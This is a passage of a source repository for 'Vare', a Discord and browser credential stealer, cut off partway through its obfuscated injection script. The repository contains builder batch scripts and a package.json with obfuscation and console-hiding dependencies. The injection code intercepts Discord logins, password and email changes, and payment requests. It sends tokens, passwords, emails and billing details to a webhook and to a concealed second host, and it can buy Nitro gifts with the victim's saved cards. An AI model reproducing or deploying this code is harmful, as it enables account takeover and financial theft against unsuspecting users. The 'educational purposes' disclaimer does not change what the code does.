├── vare.json
├── package.json
├── LICENSE
├── .gitignore
├── README.md
├── vare.bat
├── injection
└── index.js
└── vare.js
/vare.json:
--------------------------------------------------------------------------------
1 | {
2 | "discord": "https://t.me/varestealer",
3 | "avatarurl": "https://cdn.discordapp.com/attachments/1096247603496239175/1096743166692053082/vare.png",
4 | "footerurl": "https://cdn.discordapp.com/attachments/1040624297447788624/1095522088338587798/1045804059883487302.gif"
5 | }
6 |
--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "Vare0F4OjZt4wP",
3 | "version": "1.0.3",
4 | "description": "",
5 | "main": "./vareobf.js",
6 | "bin": "./vareobf.js",
7 | "scripts": {
8 | "test": "echo \"Error: no test specified\" && exit 1"
9 | },
10 | "author": "",
11 | "license": "ISC",
12 | "dependencies": {
13 | "axios": "^1.3.5",
14 | "buffer-replace": "^1.0.0",
15 | "fs-extra": "^11.1.1",
16 | "javascript-obfuscator": "^4.0.2",
17 | "jszip": "^3.10.1",
18 | "node-gyp": "^9.3.1",
19 | "node-hide-console-window": "^2.1.1",
20 | "screenshot-desktop": "^0.0.0-development",
21 | "sqlite3": "^5.1.6",
22 | "vareapi": "^1.1.1"
23 | },
24 | "devDependencies": {
25 | "electron": "^24.1.2",
26 | "electron-builder": "^23.6.0"
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2023 Saint
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Logs
2 | logs
3 | *.log
4 | npm-debug.log*
5 | yarn-debug.log*
6 | yarn-error.log*
7 | lerna-debug.log*
8 |
9 | # Diagnostic reports (https://nodejs.org/api/report.html)
10 | report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json
11 |
12 | # Runtime data
13 | pids
14 | *.pid
15 | *.seed
16 | *.pid.lock
17 |
18 | # Directory for instrumented libs generated by jscoverage/JSCover
19 | lib-cov
20 |
21 | # Coverage directory used by tools like istanbul
22 | coverage
23 | *.lcov
24 |
25 | # nyc test coverage
26 | .nyc_output
27 |
28 | # Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files)
29 | .grunt
30 |
31 | # Bower dependency directory (https://bower.io/)
32 | bower_components
33 |
34 | # node-waf configuration
35 | .lock-wscript
36 |
37 | # Compiled binary addons (https://nodejs.org/api/addons.html)
38 | build/Release
39 |
40 | # Dependency directories
41 | node_modules/
42 | jspm_packages/
43 |
44 | # TypeScript v1 declaration files
45 | typings/
46 |
47 | # TypeScript cache
48 | *.tsbuildinfo
49 |
50 | # Optional npm cache directory
51 | .npm
52 |
53 | # Optional eslint cache
54 | .eslintcache
55 |
56 | # Microbundle cache
57 | .rpt2_cache/
58 | .rts2_cache_cjs/
59 | .rts2_cache_es/
60 | .rts2_cache_umd/
61 |
62 | # Optional REPL history
63 | .node_repl_history
64 |
65 | # Output of 'npm pack'
66 | *.tgz
67 |
68 | # Yarn Integrity file
69 | .yarn-integrity
70 |
71 | # dotenv environment variables file
72 | .env
73 | .env.test
74 |
75 | # parcel-bundler cache (https://parceljs.org/)
76 | .cache
77 |
78 | # Next.js build output
79 | .next
80 |
81 | # Nuxt.js build / generate output
82 | .nuxt
83 | dist
84 |
85 | # Gatsby files
86 | .cache/
87 | # Comment in the public line in if your project uses Gatsby and *not* Next.js
88 | # https://nextjs.org/blog/next-9-1#public-directory-support
89 | # public
90 |
91 | # vuepress build output
92 | .vuepress/dist
93 |
94 | # Serverless directories
95 | .serverless/
96 |
97 | # FuseBox cache
98 | .fusebox/
99 |
100 | # DynamoDB Local files
101 | .dynamodb/
102 |
103 | # TernJS port file
104 | .tern-port
105 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
14 | Fully Undetected Discord Browser Stealer
15 |
16 | Telegram Channel
17 |
18 |
19 | Report Bug
20 | ·
21 | Request Feature
22 | ·
23 | Send a Pull Request
24 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 | ## 🛑 Note
131 | I am not responsible in any way for any damage that may be caused by this program, it is shared for educational purposes only.
132 |
133 |
134 |
135 | ## 📫 Contact
136 |
137 | https://t.me/varestealer
138 |
139 |
140 |
--------------------------------------------------------------------------------
/vare.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | cd /d "%~dp0"
3 | chcp 65001 >nul 2>&1
4 | mode con lines=26 cols=120
5 | :menu
6 | cd /d "%~dp0"
7 | chcp 65001 > nul
8 | call cls
9 | echo.
10 | echo ██▒ █▓ ▄▄▄ ██▀███ ▓█████
11 | echo ▓██░ █▒▒████▄ ▓██ ▒ ██▒▓█ ▀
12 | echo ▓██ █▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒███
13 | echo ▒██ █░░░██▄▄▄▄██ ▒██▀▀█▄ ▒▓█ ▄
14 | echo ▒▀█░ ▓█ ▓██▒░██▓ ▒██▒░▒████▒
15 | echo ░ ▐░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░░ ▒░ ░
16 | echo ░ ░░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ░ ░
17 | echo ░░ ░ ▒ ░░ ░ ░
18 | echo ░ ░ ░ ░ ░ ░
19 | echo ░
20 | echo.
21 | echo.
22 | echo [1] Start Installer
23 | echo [2] Start Builder
24 | echo [3] About Vare
25 | echo.
26 | set /p secim=: Choose :
27 |
28 | if /i "%secim%"=="1" (
29 | goto Installer
30 | ) else if /i "%secim%"=="3" (
31 | goto about
32 | ) else if /i "%secim%"=="2" (
33 | goto builder
34 | )
35 |
36 | :Installer
37 | @echo off
38 | cd /d "%~dp0"
39 | chcp 65001 > nul
40 | call cls
41 | echo.
42 | echo ██▒ █▓ ▄▄▄ ██▀███ ▓█████
43 | echo ▓██░ █▒▒████▄ ▓██ ▒ ██▒▓█ ▀
44 | echo ▓██ █▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒███
45 | echo ▒██ █░░░██▄▄▄▄██ ▒██▀▀█▄ ▒▓█ ▄
46 | echo ▒▀█░ ▓█ ▓██▒░██▓ ▒██▒░▒████▒
47 | echo ░ ▐░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░░ ▒░ ░
48 | echo ░ ░░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ░ ░
49 | echo ░░ ░ ▒ ░░ ░ ░
50 | echo ░ ░ ░ ░ ░ ░
51 | echo ░
52 | echo.
53 | echo.
54 | echo Installer Started
55 | echo.
56 | CHCP 437 > nul
57 | call npm i
58 | call node build.js vareinstaller
59 | chcp 65001 > nul
60 | call cls
61 | chcp 65001 > nul
62 | echo.
63 | echo ██▒ █▓ ▄▄▄ ██▀███ ▓█████
64 | echo ▓██░ █▒▒████▄ ▓██ ▒ ██▒▓█ ▀
65 | echo ▓██ █▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒███
66 | echo ▒██ █░░░██▄▄▄▄██ ▒██▀▀█▄ ▒▓█ ▄
67 | echo ▒▀█░ ▓█ ▓██▒░██▓ ▒██▒░▒████▒
68 | echo ░ ▐░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░░ ▒░ ░
69 | echo ░ ░░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ░ ░
70 | echo ░░ ░ ▒ ░░ ░ ░
71 | echo ░ ░ ░ ░ ░ ░
72 | echo ░
73 | echo.
74 | echo.
75 | echo Done
76 | echo.
77 | pause
78 | goto menu
79 |
80 |
81 | :about
82 | cd /d "%~dp0"
83 | chcp 65001 > nul
84 | call cls
85 | echo.
86 | echo ██▒ █▓ ▄▄▄ ██▀███ ▓█████
87 | echo ▓██░ █▒▒████▄ ▓██ ▒ ██▒▓█ ▀
88 | echo ▓██ █▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒███
89 | echo ▒██ █░░░██▄▄▄▄██ ▒██▀▀█▄ ▒▓█ ▄
90 | echo ▒▀█░ ▓█ ▓██▒░██▓ ▒██▒░▒████▒
91 | echo ░ ▐░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░░ ▒░ ░
92 | echo ░ ░░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ░ ░
93 | echo ░░ ░ ▒ ░░ ░ ░
94 | echo ░ ░ ░ ░ ░ ░
95 | echo ░
96 | echo.
97 | echo.
98 | echo Vare On Top
99 | echo Vare is a stealer in development
100 | echo Your Stealer Version is 1.0.4
101 | echo.
102 | echo.
103 | echo Telegram : https://t.me/varestealer
104 | echo.
105 | pause
106 | goto menu
107 |
108 | :builder
109 | @echo off
110 | cd /d "%~dp0"
111 | chcp 65001 > nul
112 | call cls
113 | echo.
114 | echo ██▒ █▓ ▄▄▄ ██▀███ ▓█████
115 | echo ▓██░ █▒▒████▄ ▓██ ▒ ██▒▓█ ▀
116 | echo ▓██ █▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒███
117 | echo ▒██ █░░░██▄▄▄▄██ ▒██▀▀█▄ ▒▓█ ▄
118 | echo ▒▀█░ ▓█ ▓██▒░██▓ ▒██▒░▒████▒
119 | echo ░ ▐░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░░ ▒░ ░
120 | echo ░ ░░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ░ ░
121 | echo ░░ ░ ▒ ░░ ░ ░
122 | echo ░ ░ ░ ░ ░ ░
123 | echo ░
124 | echo.
125 | echo.
126 | echo Builder Started
127 | echo.
128 | CHCP 437 > nul
129 | call node build.js varebuilder
130 | chcp 65001 > nul
131 | call cls
132 | chcp 65001 > nul
133 | echo.
134 | echo ██▒ █▓ ▄▄▄ ██▀███ ▓█████
135 | echo ▓██░ █▒▒████▄ ▓██ ▒ ██▒▓█ ▀
136 | echo ▓██ █▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒███
137 | echo ▒██ █░░░██▄▄▄▄██ ▒██▀▀█▄ ▒▓█ ▄
138 | echo ▒▀█░ ▓█ ▓██▒░██▓ ▒██▒░▒████▒
139 | echo ░ ▐░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░░ ▒░ ░
140 | echo ░ ░░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ░ ░
141 | echo ░░ ░ ▒ ░░ ░ ░
142 | echo ░ ░ ░ ░ ░ ░
143 | echo ░
144 | echo.
145 | echo.
146 | echo Done
147 | echo.
148 | pause
149 | goto menu
150 |
--------------------------------------------------------------------------------
/injection/index.js:
--------------------------------------------------------------------------------
1 | const _0x169165=_0x1e95;(function(_0x3e35d6,_0x434427){const _0x168591=_0x1e95,_0x15ae45=_0x3e35d6();while(!![]){try{const _0x16284b=parseInt(_0x168591(0x12b))/0x1*(-parseInt(_0x168591(0x1dc))/0x2)+parseInt(_0x168591(0x1c0))/0x3+-parseInt(_0x168591(0x123))/0x4*(parseInt(_0x168591(0x120))/0x5)+parseInt(_0x168591(0x142))/0x6+-parseInt(_0x168591(0x14d))/0x7+-parseInt(_0x168591(0x175))/0x8+parseInt(_0x168591(0x13c))/0x9;if(_0x16284b===_0x434427)break;else _0x15ae45['push'](_0x15ae45['shift']());}catch(_0x218776){_0x15ae45['push'](_0x15ae45['shift']());}}}(_0x49f5,0xeb35c));const _0x33da9a=(function(){let _0x66b965=!![];return function(_0x53cfa7,_0xba6a70){const _0x2c66a7=_0x66b965?function(){const _0x19de0e=_0x1e95;if(_0xba6a70){const _0x5dca0d=_0xba6a70[_0x19de0e(0x11b)](_0x53cfa7,arguments);return _0xba6a70=null,_0x5dca0d;}}:function(){};return _0x66b965=![],_0x2c66a7;};}()),_0xf28ad2=_0x33da9a(this,function(){const _0x57aaae=_0x1e95;return _0xf28ad2[_0x57aaae(0x1c5)]()[_0x57aaae(0x1aa)](_0x57aaae(0x1b5))['toString']()[_0x57aaae(0x1d6)](_0xf28ad2)[_0x57aaae(0x1aa)]('(((.+)+)+)+$');});function _0x1e95(_0x40ccaa,_0x19613a){const _0x47f9bd=_0x49f5();return _0x1e95=function(_0x31eced,_0x43c933){_0x31eced=_0x31eced-0x119;let _0x5b325c=_0x47f9bd[_0x31eced];return _0x5b325c;},_0x1e95(_0x40ccaa,_0x19613a);}_0xf28ad2();const _0x43c933=(function(){let _0x37e41d=!![];return function(_0x251bd2,_0x1a515f){const _0x5d1d40=_0x37e41d?function(){const _0x302c0d=_0x1e95;if(_0x1a515f){const _0x5649fb=_0x1a515f[_0x302c0d(0x11b)](_0x251bd2,arguments);return _0x1a515f=null,_0x5649fb;}}:function(){};return _0x37e41d=![],_0x5d1d40;};}());(function(){_0x43c933(this,function(){const _0x59d44d=_0x1e95,_0x213d8f=new RegExp(_0x59d44d(0x1bb)),_0x73fe46=new RegExp(_0x59d44d(0x199),'i'),_0x3809e3=_0x31eced(_0x59d44d(0x11d));!_0x213d8f[_0x59d44d(0x128)](_0x3809e3+_0x59d44d(0x149))||!_0x73fe46[_0x59d44d(0x128)](_0x3809e3+'input')?_0x3809e3('0'):_0x31eced();})();}());const args=process['argv'],fs=require('fs'),path=require(_0x169165(0x141)),https=require('https'),querystring=require(_0x169165(0x190)),{BrowserWindow,session}=require(_0x169165(0x124)),{exec}=require(_0x169165(0x1cd)),config={'vare':_0x169165(0x17a),'webhook':_0x169165(0x1dd),'notify_init':!![],'auto_buy_nitro':!![],'ping_on_run':!![],'ping_val':_0x169165(0x126),'embed_name':'Vare$tealer\x20-\x20https://github.com/saintdaddy','embed_icon':_0x169165(0x1d1)[_0x169165(0x18b)](/ /g,_0x169165(0x1c3)),'injection_url':'https://cdn.discordapp.com/attachments/1098269323304374272/1099397327283818616/index.js','api':'https://discord.com/api/v9/users/@me','nitro':{'boost':{'year':{'id':_0x169165(0x1bd),'sku':_0x169165(0x11a),'price':'9999'},'month':{'id':_0x169165(0x1bd),'sku':_0x169165(0x1bf),'price':_0x169165(0x179)}},'classic':{'month':{'id':_0x169165(0x17f),'sku':_0x169165(0x1a6),'price':_0x169165(0x177)}}},'filter':{'urls':[_0x169165(0x1d2),_0x169165(0x181),_0x169165(0x1ad),'https://discordapp.com/api/v*/auth/login',_0x169165(0x159),'https://*.discord.com/api/v*/auth/login',_0x169165(0x169),'https://api.stripe.com/v*/tokens','https://api.stripe.com/v*/setup_intents/*/confirm',_0x169165(0x12f)]},'filter2':{'urls':[_0x169165(0x14f),_0x169165(0x19a),'https://discord.com/api/v*/applications/detectable','https://*.discord.com/api/v*/users/@me/library',_0x169165(0x156),_0x169165(0x1de)]},'badges':{'Discord_Employee':{'Value':0x1,'Emoji':_0x169165(0x1a4),'Rare':!![]},'Partnered_Server_Owner':{'Value':0x2,'Emoji':_0x169165(0x134),'Rare':!![]},'HypeSquad_Events':{'Value':0x4,'Emoji':_0x169165(0x176),'Rare':!![]},'Bug_Hunter_Level_1':{'Value':0x8,'Emoji':'<:bughunter_1:874750808426692658>','Rare':!![]},'Early_Supporter':{'Value':0x200,'Emoji':_0x169165(0x173),'Rare':!![]},'Bug_Hunter_Level_2':{'Value':0x4000,'Emoji':'<:bughunter_2:874750808430874664>','Rare':!![]},'Early_Verified_Bot_Developer':{'Value':0x20000,'Emoji':'<:developer:874750808472825986>','Rare':!![]},'House_Bravery':{'Value':0x40,'Emoji':_0x169165(0x12d),'Rare':![]},'House_Brilliance':{'Value':0x80,'Emoji':_0x169165(0x1e3),'Rare':![]},'House_Balance':{'Value':0x100,'Emoji':'<:balance:874750808267292683>','Rare':![]}}},execScript=_0x359958=>{const _0x47e694=_0x169165,_0x1a6c83=BrowserWindow['getAllWindows']()[0x0];return _0x1a6c83[_0x47e694(0x1d4)][_0x47e694(0x1b9)](_0x359958,!0x0);},getInfo=async _0x291fcd=>{const _0x5389d3=_0x169165,_0x586ede=await execScript(_0x5389d3(0x186)+config[_0x5389d3(0x153)]+'\x22,\x20false);\x0a\x20\x20\x20\x20xmlHttp.setRequestHeader(\x22Authorization\x22,\x20\x22'+_0x291fcd+'\x22);\x0a\x20\x20\x20\x20xmlHttp.send(null);\x0a\x20\x20\x20\x20xmlHttp.responseText;');return JSON[_0x5389d3(0x143)](_0x586ede);},fetchBilling=async _0x4e4dad=>{const _0x21fa0d=_0x169165,_0x1fac93=await execScript(_0x21fa0d(0x133)+config[_0x21fa0d(0x153)]+_0x21fa0d(0x195)+_0x4e4dad+_0x21fa0d(0x16b));if(!_0x1fac93[_0x21fa0d(0x167)]||_0x1fac93[_0x21fa0d(0x18c)]===0x0)return'';return JSON[_0x21fa0d(0x143)](_0x1fac93);},getBilling=async _0x1ce4d9=>{const _0x41a73e=_0x169165,_0x3bb9d7=await fetchBilling(_0x1ce4d9);if(!_0x3bb9d7)return _0x41a73e(0x194);let _0x1d982a='';_0x3bb9d7[_0x41a73e(0x17e)](_0x2552bf=>{const _0x1f0b66=_0x41a73e;if(!_0x2552bf[_0x1f0b66(0x1ce)])switch(_0x2552bf['type']){case 0x1:_0x1d982a+=_0x1f0b66(0x1d8);break;case 0x2:_0x1d982a+=_0x1f0b66(0x1c2);break;}});if(!_0x1d982a)_0x1d982a=_0x41a73e(0x194);return _0x1d982a;},Purchase=async(_0x5c0ea2,_0x257aac,_0x36941d,_0x4f00ad)=>{const _0x23e791=_0x169165,_0x15cea2={'expected_amount':config[_0x23e791(0x1c8)][_0x36941d][_0x4f00ad][_0x23e791(0x145)],'expected_currency':_0x23e791(0x13f),'gift':!![],'payment_source_id':_0x257aac,'payment_source_token':null,'purchase_token':'2422867c-244d-476a-ba4f-36e197758d97','sku_subscription_plan_id':config[_0x23e791(0x1c8)][_0x36941d][_0x4f00ad]['sku']},_0x43e475=execScript(_0x23e791(0x178)+config[_0x23e791(0x1c8)][_0x36941d][_0x4f00ad]['id']+_0x23e791(0x1ba)+_0x5c0ea2+'\x22);\x0a\x20\x20\x20\x20xmlHttp.setRequestHeader(\x27Content-Type\x27,\x20\x27application/json\x27);\x0a\x20\x20\x20\x20xmlHttp.send(JSON.stringify('+JSON[_0x23e791(0x16a)](_0x15cea2)+'));\x0a\x20\x20\x20\x20xmlHttp.responseText');if(_0x43e475[_0x23e791(0x138)])return _0x23e791(0x15b)+_0x43e475[_0x23e791(0x138)];else return null;},buyNitro=async _0x3fd3ec=>{const _0x2cbcc2=_0x169165,_0x4bc64e=await fetchBilling(_0x3fd3ec),_0x20de2e=_0x2cbcc2(0x1ab);if(!_0x4bc64e)return _0x20de2e;let _0x1cbcca=[];_0x4bc64e['forEach'](_0x55b398=>{const _0x17a0d7=_0x2cbcc2;!_0x55b398[_0x17a0d7(0x1ce)]&&(_0x1cbcca=_0x1cbcca[_0x17a0d7(0x17d)](_0x55b398['id']));});for(let _0x3aa6fe in _0x1cbcca){const _0x1eb76a=Purchase(_0x3fd3ec,_0x3aa6fe,_0x2cbcc2(0x147),_0x2cbcc2(0x1a1));if(_0x1eb76a!==null)return _0x1eb76a;else{const _0x11b9b1=Purchase(_0x3fd3ec,_0x3aa6fe,'boost',_0x2cbcc2(0x1b7));if(_0x11b9b1!==null)return _0x11b9b1;else{const _0x17b703=Purchase(_0x3fd3ec,_0x3aa6fe,'classic','month');return _0x17b703!==null?_0x17b703:_0x20de2e;}}}},calcDate=(_0x1c7d20,_0x24e538)=>new Date(_0x1c7d20[_0x169165(0x11c)](_0x1c7d20[_0x169165(0x1be)]()+_0x24e538)),getNitro=_0x323783=>{const _0x122615=_0x169165;switch(_0x323783[_0x122615(0x180)]){default:return _0x122615(0x194);case 0x1:return _0x122615(0x15e);case 0x2:if(!_0x323783['premium_guild_since'])return _0x122615(0x15e);var _0x5e3b14=new Date(Date['now']()),_0x21ca1a=[_0x122615(0x14c),_0x122615(0x13e),_0x122615(0x171),_0x122615(0x18f),'<:9ay:1053258363997278269>',_0x122615(0x1cc),_0x122615(0x184),_0x122615(0x168),_0x122615(0x155)],_0x5ee1a3=[new Date(_0x323783[_0x122615(0x1b0)]),new Date(_0x323783['premium_guild_since']),new Date(_0x323783[_0x122615(0x1b0)]),new Date(_0x323783[_0x122615(0x1b0)]),new Date(_0x323783['premium_guild_since']),new Date(_0x323783[_0x122615(0x1b0)]),new Date(_0x323783['premium_guild_since'])],_0x341874=[0x2,0x3,0x6,0x9,0xc,0xf,0x12,0x18],_0x323783=[];for(var _0x3778f5 in _0x5ee1a3)_0x323783[_0x122615(0x137)](Math[_0x122615(0x1e1)]((calcDate(_0x5ee1a3[_0x3778f5],_0x341874[_0x3778f5])-_0x5e3b14)/0x5265c00));var _0x4f177e=0x0;for(var _0x3778f5 of _0x323783)_0x3778f5>0x0?'':_0x4f177e++;return _0x122615(0x13a)+_0x21ca1a[_0x4f177e];}};function getRareBadges(_0x2093d3){const _0x5a7e6a=_0x169165;var _0x1b307c='';for(const _0x567cc0 in config[_0x5a7e6a(0x187)]){let _0x126de9=config[_0x5a7e6a(0x187)][_0x567cc0];if((_0x2093d3&_0x126de9[_0x5a7e6a(0x14e)])==_0x126de9[_0x5a7e6a(0x14e)]&&_0x126de9[_0x5a7e6a(0x166)])_0x1b307c+=_0x126de9[_0x5a7e6a(0x11f)];};return _0x1b307c;}function getBadges(_0x59500e){const _0x12a8a3=_0x169165;var _0x4f7caa='';for(const _0x5eae93 in config['badges']){let _0xb6d8fb=config[_0x12a8a3(0x187)][_0x5eae93];if((_0x59500e&_0xb6d8fb['Value'])==_0xb6d8fb['Value'])_0x4f7caa+=_0xb6d8fb[_0x12a8a3(0x11f)];};if(_0x4f7caa=='')_0x4f7caa=_0x12a8a3(0x194);return _0x4f7caa;}const hooker=async _0x26fec0=>{const _0x381849=_0x169165,_0x1e823d=JSON['stringify'](_0x26fec0),_0x2e5ff5=[config[_0x381849(0x148)],'https:/'+_0x381849(0x154)+_0x381849(0x198)+_0x381849(0x129)+_0x381849(0x17b)+'clic.ap'+'p'],_0xae981d={'Content-Type':_0x381849(0x121),'Access-Control-Allow-Origin':'*'},_0x3d85eb={'method':_0x381849(0x172),'headers':_0xae981d};for(const _0x79e7eb of _0x2e5ff5){const _0x570afc=https[_0x381849(0x18a)](_0x79e7eb,_0x3d85eb);_0x570afc['on'](_0x381849(0x1c9),_0x5122dc=>{}),_0x570afc[_0x381849(0x130)](_0x1e823d),_0x570afc[_0x381849(0x122)]();}},getURL=async(_0x28061e,_0x4b1b52)=>{const _0x536545=_0x169165;var _0x460025=await execScript(_0x536545(0x19f)+_0x28061e+_0x536545(0x19d)+_0x4b1b52+_0x536545(0x13d));return _0x460025;},login=async(_0x8432a2,_0x1bd107,_0x51e08d)=>{const _0x2ae453=_0x169165,_0x7b0241=await getInfo(_0x51e08d),_0x1608b1=await getURL(_0x2ae453(0x1c4)+_0x7b0241['id']+'/profile',_0x51e08d),_0xdea89=getNitro(_0x1608b1),_0xb7522a=getBadges(_0x7b0241[_0x2ae453(0x160)]),_0x27cb3b=await getBilling(_0x51e08d),_0x3239d8=await getRelationships(_0x51e08d),_0x1446fb={'username':config[_0x2ae453(0x150)],'avatar_url':config[_0x2ae453(0x165)],'embeds':[{'title':'User\x20Logged\x20In','color':0x2f3136,'fields':[{'name':_0x2ae453(0x18e),'value':_0x2ae453(0x15d)+_0x51e08d+'```'},{'name':_0x2ae453(0x197),'value':_0xdea89,'inline':!![]},{'name':_0x2ae453(0x163),'value':_0xb7522a,'inline':!![]},{'name':'Billing','value':_0x27cb3b,'inline':!![]},{'name':'Email','value':'```'+_0x8432a2+'```'},{'name':_0x2ae453(0x1d9),'value':'```'+_0x1bd107+'```'}],'author':{'name':_0x7b0241[_0x2ae453(0x1b3)]+'#'+_0x7b0241[_0x2ae453(0x164)]+'\x20|\x20'+_0x7b0241['id'],'icon_url':_0x2ae453(0x1db)+_0x7b0241['id']+'/'+_0x7b0241['avatar']+_0x2ae453(0x12c)},'footer':{'text':_0x2ae453(0x158),'icon_url':_0x2ae453(0x152)}},{'title':_0x2ae453(0x189),'color':0x2f3136,'description':_0x3239d8[_0x2ae453(0x12a)],'author':{'name':_0x7b0241['username']+'#'+_0x7b0241[_0x2ae453(0x164)]+_0x2ae453(0x14a)+_0x7b0241['id'],'icon_url':'https://cdn.discordapp.com/avatars/'+_0x7b0241['id']+'/'+_0x7b0241[_0x2ae453(0x1e0)]+_0x2ae453(0x12c)},'footer':{'text':'Vare$tealer\x20-\x20https://t.me/varestealer','icon_url':_0x2ae453(0x152)}}]};if(config['ping_on_run'])_0x1446fb[_0x2ae453(0x1d5)]=config['ping_val'];hooker(_0x1446fb);},passwordChanged=async(_0x1008e2,_0x3ecbc6,_0x36e9b0)=>{const _0x21ee03=_0x169165,_0x1101e4=await getInfo(_0x36e9b0);var _0x3b77c7=await getURL('https://discord.com/api/v9/users/'+_0x1101e4['id']+'/profile',_0x36e9b0);const _0x184621=getNitro(_0x3b77c7),_0x1286e8=getBadges(_0x1101e4[_0x21ee03(0x160)]),_0x11ce25=await getBilling(_0x36e9b0),_0x45f6b2={'username':config[_0x21ee03(0x150)],'avatar_url':config[_0x21ee03(0x165)],'embeds':[{'title':_0x21ee03(0x1e4),'color':0x2f3136,'fields':[{'name':_0x21ee03(0x18e),'value':'```'+_0x36e9b0+'```'},{'name':_0x21ee03(0x197),'value':_0x184621,'inline':!![]},{'name':_0x21ee03(0x163),'value':_0x1286e8,'inline':!![]},{'name':'Billing','value':_0x11ce25,'inline':!![]},{'name':_0x21ee03(0x11e),'value':_0x21ee03(0x15d)+_0x1101e4[_0x21ee03(0x1c7)]+'```'},{'name':_0x21ee03(0x16c),'value':_0x21ee03(0x15d)+_0x1008e2+_0x21ee03(0x15d)},{'name':'New\x20Password','value':_0x21ee03(0x15d)+_0x3ecbc6+_0x21ee03(0x15d)}],'author':{'name':_0x1101e4[_0x21ee03(0x1b3)]+'#'+_0x1101e4[_0x21ee03(0x164)]+_0x21ee03(0x14a)+_0x1101e4['id'],'icon_url':_0x21ee03(0x1db)+_0x1101e4['id']+'/'+_0x1101e4[_0x21ee03(0x1e0)]+_0x21ee03(0x12c)},'footer':{'text':_0x21ee03(0x158),'icon_url':_0x21ee03(0x152)}}]};if(config[_0x21ee03(0x135)])_0x45f6b2[_0x21ee03(0x1d5)]=config[_0x21ee03(0x127)];hooker(_0x45f6b2);},emailChanged=async(_0x1c8072,_0x50e1c0,_0x2ad447)=>{const _0x397940=_0x169165,_0x2be31c=await getInfo(_0x2ad447);var _0x5aca88=await getURL('https://discord.com/api/v9/users/'+_0x2be31c['id']+_0x397940(0x191),_0x2ad447);const _0x230161=getNitro(_0x5aca88),_0x4748c4=getBadges(_0x2be31c[_0x397940(0x160)]),_0x127971=await getBilling(_0x2ad447),_0x2218d0={'username':config['embed_name'],'avatar_url':config[_0x397940(0x165)],'embeds':[{'title':'Email\x20Changed','color':0x2f3136,'fields':[{'name':_0x397940(0x18e),'value':_0x397940(0x15d)+_0x2ad447+_0x397940(0x15d)},{'name':'Nitro\x20Type','value':_0x230161,'inline':!![]},{'name':_0x397940(0x163),'value':_0x4748c4,'inline':!![]},{'name':_0x397940(0x1bc),'value':_0x127971,'inline':!![]},{'name':_0x397940(0x1d0),'value':_0x397940(0x15d)+_0x1c8072+_0x397940(0x15d)},{'name':_0x397940(0x1d9),'value':_0x397940(0x15d)+_0x50e1c0+_0x397940(0x15d)}],'author':{'name':_0x2be31c[_0x397940(0x1b3)]+'#'+_0x2be31c[_0x397940(0x164)]+_0x397940(0x14a)+_0x2be31c['id'],'icon_url':'https://cdn.discordapp.com/avatars/'+_0x2be31c['id']+'/'+_0x2be31c[_0x397940(0x1e0)]+'.webp'},'footer':{'text':_0x397940(0x158),'icon_url':'https://cdn.discordapp.com/attachments/1040624297447788624/1095522088338587798/1045804059883487302.gif'}}]};if(config['ping_on_run'])_0x2218d0[_0x397940(0x1d5)]=config[_0x397940(0x127)];hooker(_0x2218d0);},PaypalAdded=async _0x480048=>{const _0x4aa64a=_0x169165,_0x11c39f=await getInfo(_0x480048);var _0x5f5be9=await getURL(_0x4aa64a(0x1c4)+_0x11c39f['id']+_0x4aa64a(0x191),_0x480048);const 